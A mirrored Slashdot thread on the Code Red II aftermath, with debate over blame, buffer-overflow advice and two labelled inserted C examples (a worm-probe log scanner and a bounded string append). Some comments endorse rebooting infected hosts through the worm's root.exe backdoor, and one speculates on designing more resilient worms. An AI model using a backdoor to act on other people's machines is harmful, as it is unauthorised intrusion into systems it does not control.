Slashdot Mirror


Code Red: the Aftermath

LiquidPC writes: "Microsoft has released a tool to help clean up the effects of the Code Red II. It removes the files and mappings installed by the worm, and reboots your system; it also gives you an option to permanently disable IIS." So, Microsoft has given you a mop to clean up the mess they made. Start mopping! If you're not the one infected, just tired of seeing your Apache logs fill up, you might see this page.

151 of 505 comments

  1. But that doesn't help if... by Ungrounded+Lightning · · Score: 2

    The worm only stays resident in memory after you are infected. Therefore, you are instantly clean after a reboot. It _does_ not stay anywhere else except RAM, which is cleared when you reboot.

    But the trojan modifications by the newer version of the worm are permanent, and will NOT be removed by rebooting and installing the patch. The patch just prevents reinfection by the original buffer overflow bug.

    Look here for a tool to TRY to clean up the system.

    But note that once the system has had the FIRST backdoor installed, that may have been used to install other backdoors, unknown to the author of the cleanout tool. An infected machine is advertising its vulnerability to the entire net by the infection attempts it makes.

    The only real solution is to reinstall the whole machine, and install the patch before going live on the net.

    (And while you're at it - why not install Linux or a BSD instead, and switch to the Apache web server, which doesn't HAVE this problem.)

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  2. Re:FUD ALERT by dzeanah · · Score: 2, Informative

    Second, that FUD about service packs re-breaking the OS is just garbage. Please give me ONE example, JUST ONE, of a service pack opening up new holes for ANY WINDOWS OS, 3.1 and up. You can't because you are a paid basher talking out of your ass. Service pack 2 for NT Server made it so my machine rebooted the 2nd time I accessed a device on the floppy controller. Streamer or floppy -- first access is fine, 2 seconds after the 2nd access I was looking at a black screen and the PC was doing a POST (read: no shutdown, just an immediate reboot). SP3 fixed it, and it wasn't there pre-service pack. When I worked at a major law firm in Atlanta, our DC office had a ton of hard-to-reproduce problems related to the BDC over there. Turns out the admin installed SP4 when it came out because he trusted MS releases. Uninstalled to SP3 and it was solid as a rock. Put SP5 on and it was still great. SP6 sucked, but 6a was just fine (except it broke the way some NT boxes routed, apparently). So maybe the rule is to avoid even-numbered service packs.

  3. Code Red & Others As Advocacy Tool by UberOogie · · Score: 2
    Yes, it is sort of off-topic. No, I do not advocate anyone writing viruses. Go to town, moderators.

    My point is this:
    MS is now on the brink of a win so big that they will be nearly unstoppable, possibly even by the government, once it happens.

    This is, of course, .NET, which would give them a strangle-hold on ecommerce, and a hand in the pocket of nearly everyone on Passport.

    MS, and even Passport, have had huge security and service blow-ups in the past (Hotmail outages, etc.), and it hasn't even been a blip on the radar as far as most average people are concerned. It hasn't even registered on a corporate level, outside of the IT departments, who are just being blamed by the executives for not taking "proper care" of their single-platform fiats.

    Now, a high-profile virus that keeps going on and doesn't go away (like, for example, Code Red) and forces the public's attention on the issue and becomes a constant and increasing embarrassment to MS as it continually claims to have fixed the problem just before a new version shows up.

    Now, people have this in their heads, even if it is the wrong way. ("That evil Russian hacker wrote this awful virus that takes over my computer.") The point being, that even executives will start to notice it, and may take the time to read their half-page summary sheet on the problem that it only affects MS, especially their new products that they want everyone to upgrade to.

    Ultimately, only a sustained, media-covered security crisis will have any sort of effect on MS. Public opinion will only be turned when the average user is affected by it. It will happen after .NET launches and the first hack happens that compromises personal data, but it won't matter unless it happens *before* then.

    Just a thought.

    --
    "Enough of this wretched, whining monkey life." -- Marcus Aurelius, _Meditations_, Book 9, 37
  4. Actually: authors of strncat() MAN PAGE and gets() by Ungrounded+Lightning · · Score: 5, Informative

    Blame the bozo who designed strncat!

    strncat() isn't a problem by itself. The problem is improper usage patterns.

    When you're building a string by repeated strncat()s to a buffer, and you don't have guarantees about the size of the things you're concatenating, you need to prevent (or check for) overflow, something like this:

    strncat(dest, src, MIN((BUFFSIZE-1)-strlen(dest), chars_wanted_from_src));

    Without such an example in the man page it's easy to forget to guard against buffer overflow. And once code is written with guards for overflow the guard code will serve as a reminder to later programmers maintaining or upgrading the code.

    But strncat() isn't the main culprit.

    Most of the buffer overflow attacks come from reading an input using gets(). That bad boy should have had a buffer size argument, à la fgets(). And it's the decision to keep it in the standard library "for compatibility" that causes all the pain.

    The gnu compiler will warn you if you use it and the man page has a warning, so there's no excuse for it to show up in new code any more. And there's no excuse for not fixing ALL the warnings in a piece of production code, or for using (or writing) a compiler that DOESN'T warn about gets().

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  5. Service Pack MAXINT, step by step by leonbrooks · · Score: 2
    For a straight A: fix the problem forever by replacing NT with Linux...

    Shouldn't be too hard to alter one of the standard installers to:

    • Download a minimalist CygWin kit
    • Pull down a second-stage installer
    • Shrink a partition, live (might have to defrag first)
    • Add three new partitions in the shrinkage (swap, image, /var) using ReiserFS for the data partitions
    • Download and write a base Linux installation image into the image partition
    • Download and install suitable drivers for (e.g.) video card
    • Set up Linux config of network interfaces, DNS, webserver, video, etc from Windows config
    • Copy all active websites into /var/www
    • If any actually use ASP, download, install and use ASP2PHP on them
    • Make the service pack ingredients available via HTTP so that daughter sites can fetch from here instead of home base
    • Break all passwords and copy them across to PAM (invent a new root password)
    • Put the new root password on the default background wallpaper
    • Reboot into Linux, auto-login as root, and restore DNS/web service
    • Migrate all (in case something didn't translate) Windows data into /var/WASWINDOWS
    • Set up a listener at default.ida to react to future CodeRed probes
    • Go through the logs and process all attacking sites

    What have I forgotten?
    --
    Got time? Spend some of it coding or testing
  6. You're dead wrong... by dsfox · · Score: 2

    ...about this not being Microsoft's fault. 90% of the machines running Code Red have no system administrators, because they are home machines whose owners have no idea they are even running a web server. Why? Because Microsoft, in its minuscule wisdom, installs IIS (silently, and in the default zero security mode) whenever the user installs any of various pieces of Microsoft software.

    1. Re:You're dead wrong... by mpe · · Score: 2

      ...about this not being Microsoft's fault. 90% of the machines running Code Red have no system administrators, because they are home machines whose owners have no idea they are even running a web server. Why?

      End user administration appears to be one of Microsoft's central ideas. It's portrayed as making things "easier" to use and as a cost saver to corporate users. (In the case of the latter it can also increase costs because any idiot end user can mess things up...)

      Because Microsoft, in its minuscule wisdom, installs IIS (silently, and in the default zero security mode) whenever the user installs any of various pieces of Microsoft software.

      Even though the workstation version of 2000 apparently does not install IIS by default. Rarely will machines just be running Windows...

  7. Put the blame where it belongs by CAIMLAS · · Score: 2

    Everyone is saying, "blame MS", and "blame the virus writers," and/or "blame the trained monkeys." Everyone has it all wrong. All these people are responsible. MS is for having an OS that allows such exploits to be performed, and for telling people that it's easy and doesn't require skill to keep a server up and running (if you make it easy enough for a monkey to do something, monkeys will do it!). Second, the virus/worm writer, for writing it, and 3rd, the idiot monkeys for playing with something they don't have the skill to play with, and infecting each other. (Maybe like AIDS - people/monkeys play as they shouldn't, infecting each other... and everyone suffers for it.)

    --
    ~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
  8. What is everyone else doing? by ekbond · · Score: 2, Interesting

    As a sysadmin for a couple of Linux web servers, I have been monitoring this site and others to see what everyone else is doing about CR. Up to now, I have gathered that the general feeling was one of moderation: ie., to try to notify the sysadmin of the offending site and wait until they patched or fixed their equipment.

    Now, the feeling seems to be shifting. According to this message and its threads, scripting a reply to reboot the machine is accepted as a response. I am still not comfortable with this but I am willing to go along with the group.

    What does everyone else feel about this?

    1. Re:What is everyone else doing? by J'raxis · · Score: 2

      I wish there was a command to remotely turn a Windows machine into a smoldering pile of burnt plastic and silicon. But that's just how I feel.

  9. Re:Not the mess they made... by dsfox · · Score: 2

    What is the point of your message? Do you think
    posting it enough will make such lazy sysadmins
    go away?

  10. Re:Stop blaming microsoft by blakestah · · Score: 5, Informative

    The rest of us applied the patch supplied by Microsoft more than a month before CR came out...

    And were still vulnerable until we disabled URL forwarding.

    The Microsoft patch alone is not useful. You are still at risk. See Incidents home page

    I'm so sick of people blaming Microsoft. They released a patch well before Code Red. Get over it.

    Microsoft STILL hasn't released a patch that makes their webserver secure and allows URL forwarding. Their patch has its own security hole !!

    Blame Microsoft, or simply use Internet server software that is secure. All mine is written by Dan Bernstein :)

  11. Automatically block IP under IIS? by doublem · · Score: 2

    My company is running IIS 5. Perl is running on the system, and I'd like to create a script that will take any requests for default.ida and add the IP to the list of IP addresses the IIS server blocks.

    While we're at it, can the net send command be used to inform the infected system of its "condition" without resorting to exploiting the Code Red II install of root.exe?

    Anyone have any ideas for using Perl or ASP to do this?

    --
    "Live Free or Die." Don't like it? Then keep out of the USA
    1. Re:Automatically block IP under IIS? by Mike+Hicks · · Score: 2

      Well I have a PHP script that I've made, but I don't know if it works (I don't have any IIS boxes to test on).

      If you want to test it, find an IIS box. Shut off the default route, so nobody can hit you while you're doing this. Copy cmd.exe to root.exe in the scripts folder. Open a browser on the IIS box, and point it at default.ida?XXXXX an Apache system running PHP and the script. If it works, it'll pop up a window on the IIS system.

      When you're done, remove root.exe, restore your default route.
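    The request for a script that picks default.ida probes out of the logs and turns them into a block list, as an added example that is not part of the original thread or of any poster's code. It is written in C rather than the Perl or ASP asked for, reads Apache common-log-format lines, and tells the two worms apart by the filler character in the query (Code Red padded with 'N', Code Red II with 'X', as the "default.ida?XXXXX" reference above shows); it also flags follow-up probes for /scripts/root.exe. The log lines are constructed, the 10.0.0.x addresses are placeholders, the filler runs are shortened to 40 bytes, and the 32-byte threshold is an assumption for the example; the output is the list of addresses an admin would feed into whatever blocking mechanism the server has.

```c
#include <stdio.h>
#include <string.h>

enum probe_kind { PROBE_NONE = 0, PROBE_CODE_RED, PROBE_CODE_RED_II, PROBE_ROOT_EXE, PROBE_KINDS };

/* Minimum run of filler bytes treated as the worm signature.  This
 * threshold is an assumption for the example; the real requests carried
 * a few hundred filler characters. */
#define MIN_FILL 32

/* Classify one HTTP request line.  Code Red padded its default.ida query
 * with a run of 'N', Code Red II with a run of 'X'; follow-up probes for
 * the Code Red II backdoor ask for /scripts/root.exe. */
enum probe_kind classify_request(const char *req)
{
    const char *q = strstr(req, "/default.ida?");
    if (q != NULL) {
        q += strlen("/default.ida?");
        char fill = *q;
        size_t run = 0;
        if (fill == 'N' || fill == 'X')
            while (q[run] == fill) run++;
        if (run >= MIN_FILL)
            return fill == 'N' ? PROBE_CODE_RED : PROBE_CODE_RED_II;
        return PROBE_NONE;        /* some other .ida request; not the worm signature */
    }
    if (strstr(req, "/scripts/root.exe") != NULL) return PROBE_ROOT_EXE;
    return PROBE_NONE;
}

/* Extract the client address and the quoted request from one Apache
 * common-log-format line.  Returns 0 if the line does not parse. */
static int parse_line(const char *line, char *ip, size_t ipsz, char *req, size_t reqsz)
{
    const char *sp = strchr(line, ' ');
    if (sp == NULL || (size_t)(sp - line) >= ipsz) return 0;
    memcpy(ip, line, (size_t)(sp - line));
    ip[sp - line] = '\0';
    const char *open = strchr(sp, '"');
    if (open == NULL) return 0;
    const char *close = strchr(open + 1, '"');
    if (close == NULL || (size_t)(close - open - 1) >= reqsz) return 0;
    memcpy(req, open + 1, (size_t)(close - open - 1));
    req[close - open - 1] = '\0';
    return 1;
}

/* Scan a newline-separated log buffer: count probes per kind and collect
 * the distinct offending addresses (the block-list candidates).
 * Returns the number of distinct addresses recorded. */
size_t scan_log(const char *log, size_t counts[PROBE_KINDS], char ips[][16], size_t maxips)
{
    size_t nips = 0;
    memset(counts, 0, sizeof(size_t) * PROBE_KINDS);
    while (*log != '\0') {
        const char *nl = strchr(log, '\n');
        size_t len = nl ? (size_t)(nl - log) : strlen(log);
        char line[1024], ip[16], req[1024];
        if (len < sizeof line) {            /* over-long lines are skipped, not truncated */
            memcpy(line, log, len);
            line[len] = '\0';
            if (parse_line(line, ip, sizeof ip, req, sizeof req)) {
                enum probe_kind k = classify_request(req);
                counts[k]++;
                if (k != PROBE_NONE) {
                    size_t i = 0;
                    while (i < nips && strcmp(ips[i], ip) != 0) i++;
                    if (i == nips && nips < maxips) strcpy(ips[nips++], ip);
                }
            }
        }
        log = nl ? nl + 1 : log + len;
    }
    return nips;
}

/* Constructed sample log (placeholder addresses); filler runs shortened to 40 bytes. */
static const char SAMPLE_LOG[] =
    "10.0.0.5 - - [11/Aug/2001:10:01:02 -0700] \"GET /default.ida?"
    "NNNNNNNNNN" "NNNNNNNNNN" "NNNNNNNNNN" "NNNNNNNNNN" "%u9090 HTTP/1.0\" 404 -\n"
    "10.0.0.9 - - [11/Aug/2001:10:02:17 -0700] \"GET /default.ida?"
    "XXXXXXXXXX" "XXXXXXXXXX" "XXXXXXXXXX" "XXXXXXXXXX" "%u9090 HTTP/1.0\" 404 -\n"
    "10.0.0.9 - - [11/Aug/2001:10:02:18 -0700] \"GET /scripts/root.exe HTTP/1.0\" 404 -\n"
    "10.0.0.7 - - [11/Aug/2001:10:03:00 -0700] \"GET /index.html HTTP/1.1\" 200 1234\n";

int main(void)
{
    size_t counts[PROBE_KINDS];
    char ips[64][16];
    size_t n = scan_log(SAMPLE_LOG, counts, ips, 64);
    printf("Code Red: %zu  Code Red II: %zu  root.exe probes: %zu  other requests: %zu\n",
           counts[PROBE_CODE_RED], counts[PROBE_CODE_RED_II], counts[PROBE_ROOT_EXE], counts[PROBE_NONE]);
    for (size_t i = 0; i < n; i++)
        printf("block %s\n", ips[i]);
    return 0;
}
```

    On the sample it reports one probe of each kind and two addresses to block. Counting on the filler run rather than on any request for default.ida keeps legitimate Index Server queries out of the block list; the classifier says nothing about whether the remote host is still infected, which is why the thread's "reply with a reboot" idea is a separate decision.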

  12. Re:Aftermath? by meldroc · · Score: 2

    It definitely isn't over - Code Red Vigilante still reports dozens of attempted Code Red II attacks. Hopefully, at least some of the decaffeinations get through and get people to patch their machines.

    Port 80 may still be blocked by @Home, but I'm still getting attacks from other @Home customers. When are @Home's admins going to start cutting off the connections of infected machines? It's drastic, but it seems to be the only way to get the attention of some people.

    --

    Meldroc, Waster of Electrons
  13. Re:setting this up? by Mike+Hicks · · Score: 2

    That's Slashdot's posting code trying to prevent really long strings from ending up in posts and screwing up the HTML table layout.

  14. Re:Stop blaming microsoft by slushpupie · · Score: 2, Insightful

    There are many other options when using strings in C, you are not required to use a limited array of char.. in this day, if you are security conscious, you should consider all the possibilities when writing a program.

  15. If you've had a corporate hit on your network... by GC · · Score: 2

    Then there is a nice little Vulnerable Server Scanner Provided by the people at www.eeye.com.

    It basically looks for Vulnerable servers so that network admins can track them down and get the web admins to patch the machines before they get infected.

    Nice to see someone has come up with a clean, pro-active method to kill this little menace off.

  16. Re:I don't think this is funny... by BorgDrone · · Score: 2

    Clicking on that link does NOT reboot your machine even if you are infected.
    The reboot stuff only triggers when an infected machine tries to break into the machine running that script.

  17. Re:Stop blaming microsoft by Gordonjcp · · Score: 3, Funny

    Blame Alan Turing, he invented stored-program computers...

  18. Re:Some don't know they have IIS by DeeKayWon · · Score: 2
    I'd really like to know how this happens.

    I'm on Win2K Pro right now, freshly installed last night. IIS is not running, because it isn't installed by default. You have to go to Add/Remove Programs and install it yourself. So how the heck do the Win2K Pro boxen that people run somehow spontaneously install IIS on them without their knowledge? IIS is installed by default on the server varieties of Win2K, but these people shouldn't be running those. So I wonder, what's going on?

  19. Here's a clue about "Linux worms" by rickmoen · · Score: 2
    Which system did Ramen infect?

    It attacked the brainstems of morons who had left notoriously insecure network-daemon software running unpatched for a year or more. That's what we call being too stupid to live.

    Rick Moen
    rick@linuxmafia.com

  20. Microsoft's Problem! by wirefarm · · Score: 5, Insightful

    This is what happens when you give admins a false sense of security.
    After all, they became an MCSE after a couple months of hitting the books, rather than a few years of hacking old hardware. They got a certificate and the sense that the Microsoft way is the best way - If you don't understand what a dialog box is asking, just hit 'Enter' and go with the recommendation. That's how IIS got installed on all of those PCs and this 'Default.ida' nonsense too. I still don't know what a 'default.ida' is used for, and I'm a pretty technical guy. - Something to do with indexing? Whatever.
    Some of my friends are MCSEs. - Not all of them are 'hackers' who actually watch what happens in their systems. They trust that MS will send them a shiny new CD with a 'Service Pack', along with a few other goodies to play with when an update is needed.
    The problem is compounded by the fact that these Win2K CDs got passed around - Microsoft knows this and whether or not they admit it, it's part of their marketing. From what I've seen, I'd suspect that the bulk of the problems are coming from the home users who are running a borrowed copy of Win2K on their PC/Cable Modem setup. The ones who don't get the service packs and don't log into Microsoft.com to read the bulletins for fear of being asked for proof of purchase.
    So Microsoft has these thousands of unlicensed customers that they know are using their software in a dangerous manner - Everything installed, every service running - all the lights on, but nobody home. What is MS's liability?
    With all of the talk about the significance of an AOL icon vs. an IE icon on the desktop, MS *knows* how people will react when running an install - They know that if the user gets a dialog that says "Activate IIS?" that an unsure user will probably say yes, even if he has no idea what IIS is or what the risks are.
    Microsoft has got to accept the blame for this mess - It is their doing.
    Unfortunately, this is the first step in the process of requiring people running servers of any kind to be *licensed* - Now won't that be fun?

    Cheers,
    Jim in Tokyo

    --
    -- My Weblog.
    1. Re:Microsoft's Problem! by mpe · · Score: 2

      And the REAL real fix is for Microsoft to ship Win XP with a sane out-of-box IIS configuration.

      Actually a real fix would be to move away from monolithic programs. But since process creation is expensive under NT, multithreading (of multi-function programs) is preferred.

      Anyone who needs value-add services can certainly find a way to turn them on. If Linux distros shipped with a thousand Apache modules installed and configured, you'd probably have much of the same problems.

      Except that it would be less obscure to find a fix. IIS isn't modular...

    2. Re:Microsoft's Problem! by MrBogus · · Score: 4, Informative

      - If you don't understand what a dialog box is asking, just hit 'Enter' and go with the recommendation. That's how IIS got installed on all of those PCs and this 'Default.ida' nonsense too. I still don't know what a 'default.ida' is used for, and I'm a pretty technical guy. - Something to do with indexing? Whatever.

      Since you asked... Most people install IIS because they want to serve HTML or ASP pages, or maybe just FTP.

      What Microsoft doesn't tell you is that Internet Information Service_s_ automatically installs a bunch of other ISAPI services which enable crap that you most likely do not want. Examples include:
      + The ability to query Index Server indexes (idq.dll)
      + Internet Printing
      + Remote data queries
      etc etc

      Some of these things, particularly idq.dll have *repeatedly* had security holes. And that's why installing the patch is not a fix, because it's only a matter of time until Code Red IV is exploiting another IIS bug to similar effect.

      The real fix is to disable the extension mappings for things like .ida/.idq and so on (UI is buried in the Computer Management console), and then sleep at night because you don't have to worry about most of the IIS patches. Of course, neither Microsoft or the mainstream media, or slashdot for the most part is offering this advice. (Somewhere buried on their site, they have a 'Securing IIS' document where this is the #1 recommendation, but since they aren't getting the word out, their ass will be bitten hard again.)

      And the REAL real fix is for Microsoft to ship Win XP with a sane out-of-box IIS configuration. Anyone who needs value-add services can certainly find a way to turn them on. If Linux distros shipped with a thousand Apache modules installed and configured, you'd probably have much of the same problems.

      --

      When I hear the word 'innovation', I reach for my pistol.
  21. Re:strikeback fun, but not working very often... by RedX · · Score: 2

    IIRC, any MS machine that is a non-server OS will only allow 10 network connections, so I'd think that the PWS service would fall under this limitation.

  22. Next step: read the damn articles by cabbey · · Score: 2

    I mean Michael went to all the trouble to link to such a script and all, a few tweaks and you've got what you asked for.

    It's a pointless endeavour though. Of the 1300+ unique hosts that have bounced off my apache machines in the last ~70 hours, only 10 seem to actually be accepting requests for root.exe... the rest throw back either a 404 or a 403, with a lot refusing connections, or just returning a "server overloaded" message. Of those ten accepting requests for root.exe two returned some kind of funny response, one redirected to goatse.cx, and the other seven seemed to actually accept commands.

  23. Re:Remind me again... by Omnifarious · · Score: 2

    Well, the first item in that list isn't actually an Apache exploit. It's a piece of trojan code that people are tricked into running by telling them that it's an exploit detector.

    If you expect a count of google hit results to somehow bear any weight in this argument, you're an idiot. One, any given exploit will have 5-10 hits as google indexes mailing list archives. Two, it will catch all mention of 'Apache' and 'exploit' whether or not the thing being mentioned really IS an Apache exploit.

  24. False sense of security by einhverfr · · Score: 2
    Here is my disclosure: I hold an MCSE (I also hold Linux Professional Institute Level 1, Server+, Network+, A+, and Inet+ certs but that is beside the point).

    The Windows GUI follows many of the same design principles that Mac followed for years which is why Apple never marketed the Macs as servers-- the abstraction is great in a workstation but in a complex server environment it is dangerous not to have the ability to participate in the system in the way one does with UNIX. Apple sold servers too, but they ran on UNIX.

    Now you have trained monkeys who think they know everything about NT, which really amounts to "reboot when it bluescreens." They think that they are secure because of the quality of Microsoft's software. Yet they don't know really how TCP works so they have no clue how to begin to think about security from the outside-- all they know is security from the inside which is all the exams cover, and all Microsoft wants you to think about because that is where they have the most features (yeah, if you can break in from the outside, you can break in from the inside, though).

    So now, Microsoft has issued a patch to remove a backdoor-- one loudly advertised. Where is the security in that? They should have, on their web site, in no uncertain terms, exactly what their engineers are telling their customers and exactly what the rest of the security community is saying: If you are infected, reload your computers.

    There is a false sense of security in using this patch. Your IIS server has a backdoor which was heavily advertised to the net. Anybody could have installed another backdoor and you, as the admin would probably never find it. Not, at any rate, until someone used it to deface your site, publish your confidential information, destroy critical information, or other such activity...

    --

    LedgerSMB: Open source Accounting/ERP
  25. Re:Stop blaming microsoft by SuiteSisterMary · · Score: 2

    Criminals subsequently come up with a version of bullets coated with a Teflon derivative. Manufacturer sends out information that they've an add-on spray that will prevent these new bullets from penetrating their windows. Unsprayed windows will NOT stop these new bullets. You don't get this spray and apply it. MAYBE YOU DON'T EVEN REALIZE THAT YOU'VE GOT BULLET PROOF WINDOWS. Criminals start shooting random windows. They don't actually do much, just shoot the windows. Is it the manufacturer's fault?

    --
    Vintage computer games and RPG books available. Email me if you're interested.
  26. Re:Stop blaming microsoft by Chris+Johnson · · Score: 2

    That is a really stupid place to optimise. I bet it barely shows up on profiling at all, compared to memory management and offscreen bitmap drawing :)

  27. More specifically... by Giant+Hairy+Spider · · Score: 3, Insightful

    Blame the bozo who designed strncat!

    This may not be the cause of this particular overflow, but it causes a very large number of them.

    The main reason you'd use strncat rather than strcat is to avoid buffer overflows, yet instead of the obvious choice of feeding it the buffer size, you have to feed it the maximum number of characters to add. So to use it to prevent buffer overflows, you not only need to remember the buffer size, you have to track the current string length!

    Avoid strncat! Even if you understand it, someone who changes your code might not.

    Make something more intuitive:

    #include <stddef.h>

    char *buf_strcat(char *dest, const char *src, size_t buflen){
    char *cur=dest;
    size_t i=0;                                /* size_t, not int: buflen is unsigned */
    if(buflen==0) return dest;                 /* no room even for the terminator */
    while(*cur && i<buflen-1){cur++; i++;}     /* find the end of what is already there */
    while(*src && i<buflen-1){*cur++ = *src++; i++;}  /* copy while room remains */
    *cur='\0';
    return dest;
    }

    --

    ---
    You'd be surprised at the broadband connection available to things crawling around in your hair.
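    The bounded-append pattern that both strncat() comments above argue about, as an added example that is not code from either poster. It assumes the standard C library only; append_bounded() and build_line() are names chosen here, and the request fragments in main() are constructed sample input. The point it makes concrete is the one in those comments: the third argument to strncat() is the space left in the buffer, which means tracking the current length, and the caller needs a signal that truncation happened rather than a silent overflow.

```c
#include <stdio.h>
#include <string.h>

/* Append src to the NUL-terminated string in dest without writing past
 * dest[destsz - 1].  The third argument to strncat() must be the number
 * of characters still free, NOT the buffer size (the mistake the
 * comments above describe).  Returns 1 if all of src fitted, 0 if it
 * was truncated or dest was not a proper string. */
int append_bounded(char *dest, size_t destsz, const char *src)
{
    const char *nul = memchr(dest, '\0', destsz);   /* does dest end within the buffer? */
    if (nul == NULL) {
        if (destsz) dest[destsz - 1] = '\0';        /* repair rather than read off the end */
        return 0;
    }
    size_t used = (size_t)(nul - dest);
    size_t room = destsz - 1 - used;                /* characters we may still add */
    size_t need = strlen(src);
    strncat(dest, src, room);                       /* strncat always appends a NUL */
    return need <= room;
}

/* Build one line from several pieces of untrusted length.  Returns how
 * many pieces were appended in full, so the caller can tell that
 * truncation happened instead of overflowing as strcat()/gets() would. */
int build_line(char *out, size_t outsz, const char *const *pieces, size_t n)
{
    int complete = 0;
    if (outsz == 0) return 0;
    out[0] = '\0';
    for (size_t i = 0; i < n; i++)
        complete += append_bounded(out, outsz, pieces[i]);
    return complete;
}

int main(void)
{
    /* Constructed sample: a default.ida request path followed by a filler
     * run longer than the buffer, the shape the worm's request had. */
    const char *pieces[] = { "GET /default.ida?",
                             "NNNNNNNN" "NNNNNNNN" "NNNNNNNN" "NNNNNNNN",   /* 32 chars */
                             " HTTP/1.0" };
    char buf[32];
    int ok = build_line(buf, sizeof buf, pieces, 3);
    printf("%d of 3 pieces fit; result (%zu chars): \"%s\"\n", ok, strlen(buf), buf);
    return 0;
}
```

    With a 32-byte buffer the first piece fits, the filler is cut to the 14 characters of room left, and the trailing " HTTP/1.0" is dropped entirely, so build_line() returns 1; the buffer is never written past its last byte and is always terminated. Returning the truncation flag is the part the library call leaves out.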
  28. Beware of Interlock by eddy · · Score: 3, Insightful

    I've had similar thoughts. I've been reading Multiagent Systems: A Modern Approach to Distributed Artificial Intelligence and with the Code Red outbreak, I've taken to reading it with malware in mind.

    What I've come to realize is that a worm could become real scary if its author, like me, were to be a fan of multi-agent systems. There's a plethora of research on agent-to-agent communication, just waiting for that big experiment to take place.

    Ponder this: interlock. The worms work together to reach a situation in which a host cannot be cleaned without data from another host, and vice-versa, thus making disinfection extremely hard

    I've been sketching a scenario where relationships are created via the infection plus one level. If A infects B (first level of interconnect), then B would tell A about every other host it infects in turn (second level). These hosts would form a cluster, where each member is free to initiate contact with another and request services. One of these could be the encryption or decryption of data. Hosts would say "Please encrypt this data (hands it over) and return the encrypted result". Say host A tells host B this. Suddenly we're in a situation where we cannot simply disinfect host B, because if we do we'll lose the key that decrypts data on host A! Of course, the worms would negotiate the complement, and host A would contain the key to unlock data in host B. We then expand this scenario to a great interconnection between members of the cluster. We can strengthen the connections by allowing unrelated hosts to negotiate interlocks.

    In the same vein worms can negotiate and divide the search-space between them. Each worm could contain a compressed/simplified representation of the IP-search-space (just a couple of masks maybe? Haven't thought too hard about it). Relatives would communicate which parts have been scanned as to not duplicate (too much) work. This then becomes a parallel binary search!

    I think I'm gonna have to write a short doomsday article too, there's just so much cool things that someone wicked could do.

    --
    Belief is the currency of delusion.
  29. Re:Liability for software defects by OmegaDan · · Score: 2
    I wonder how it is that software manufacturers have been able to escape most liability ...

    We need laws to make software companies liable for one reason -- US software already has a reputation for being of poor quality [read microsoft]. In 5 years that could become a SERIOUS economic issue for the US, maybe German software will become the avant-garde (like German engineering is thought of now), or Japanese software will be the highest quality (like Japanese steel is now). And suddenly we'll find ourselves out of the software market like we're out of the car market and out of the electronics market.

  30. Aftermath? by dohcvtec · · Score: 2, Informative

    The headline implies that the whole Code Red experience is over. I know everybody wants it to be over, but it doesn't seem to be over from where I'm sitting, looking at the sheer volume of logged packets hitting my firewall. So Microsoft has released a solution to the Code Red II worm. That's great, but now try to get most of the infected users to use it. I haven't seen any slowdown in probes from infected machines yet, so I'll believe it when I see it.

    --
    -- Never hit a man with glasses. Hit him with a baseball bat.
  31. Warhol Worm proposed: 15 minutes to total infectio by molo · · Score: 5, Interesting
    • 2001-08-11 13:18:46 Warhol Worm proposed: 15 minutes to total infection! (articles,bug) (rejected)
    Since /. rejected this story, I posted it to the K5 Queue (only visible if you have a K5 account).

    Here's the scoop (more meat at K5):

    According to an article in the latest issue of the RISKS digest, Nicholas Weaver of UC Berkeley has written a description of a new type of worm, the Warhol Worm. He believes that using a divide-and-conquer method, all vulnerable machines over the entire IPv4 address space could be compromised in only 15 minutes!

    `In the future, everybody will have 15 minutes of fame' -Andy Warhol

    --
    Using your sig line to advertise for friends is lame.
  32. Some don't know they have IIS by cvd6262 · · Score: 5, Insightful
    "...it also gives you an option to permanently disable IIS."

    This is a bigger fix than one might think. At the university at which I work, the major problem was not the sys admins who did not patch their servers, it was the professors who had Win2K Professional on their workstations with IIS on and didn't even know it. Some of them knew about the worm, even made sure that the department's IT teams patched their servers, but did not know that they were running a web server in their office, let alone that they were infected.

    --

    I'd rather have someone respond than be modded up.

  33. At Last, the Professor Teaches the Easy Way by lildogie · · Score: 2

    Isn't it funny that they released a bonehead tool just after they found out that their own admins are boneheads?

  34. Re:FUD ALERT by crywolf · · Score: 2

    Let's see. I install Win2K Pro. I start setting it up with some degree of security, install a few apps. It occurs to me to check for updates (it had to do with getting strong encryption in Win2K), so I download SP2. I install it, or try to. Partway through, it decides it can't find its files, no matter how many times I point to it. So I cancel, and then it can't find the files it needs to undo what it did. Again, telling it where the files are does no good.

    Start over with installing Win2K Pro, but the SP is either the very next step or will not happen.

    In retrospect, it could have been that I removed permissions from Outlook Express (obviously an essential part of the operating system).

    I can certainly understand how anyone would be paranoid about installing something in Windows.

    --
    CAUTION: Product may be hot after heating
  35. You know 'Ramen' is dutch for 'windows' :) by Otis_INF · · Score: 2

    I always found it funny the RH worm was called 'Ramen', which is the plural of 'Raam' or in English: 'Window'.

    --
    Never underestimate the relief of true separation of Religion and State.
  36. The real solution. by jcr · · Score: 2

    www.eros-os.org.

    When we can run the microsquish shit under emulation, on an OS that offers real security, then viruses, trojans, and worms become infeasible.

    On EROS, there's no reason for an app to have a write capability to its own code space: ergo, no worms.

    -jcr

    --
    The only title of honor that a tyrant can grant is "Enemy of the State."
  37. Re:Why is the admins fault? by SuiteSisterMary · · Score: 2

    The patch was available a full month before Code Red 1 popped up. Off hand, I'd say that it's not Microsoft's fault. Or look at it this way. Red Hat 6.x is filled with known holes. If I install it on the public internet, is it Red Hat's fault, or my fault, for using it?

    --
    Vintage computer games and RPG books available. Email me if you're interested.
  38. The Real Fix by leonbrooks · · Score: 2
    The real fix is to disable the extension mappings for things like .ida/.idq and so on

    The real fix is to install some other web server. If it supports PHP you can also migrate your VB ASP scripts using ASP2PHP. But maybe you don't want to drag extinct-but-doesn't-know-it-yet methodology and technology across to your shiny new server?

    And... since you're changing such a major server component, why not change the whole server so that you're not, one day, forced to upgrade to Windows XP and bleed money for insecure software for the rest of your life? Install Service Pack MAXINT today!

    --
    Got time? Spend some of it coding or testing
  39. Re:Not the mess they made... by pointwood · · Score: 3, Offtopic

    Talking about rebooting - check this news.com video out.

    Everybody but Bill Gates thinks it's pretty funny :)

  40. No. by Tridus · · Score: 2

    This says nothing about the character of IIS Admins, it's about admins in general. And more importantly, people running this thing who don't even know that they have it running.

    Here is what they should have done to get this thing patched quickly.

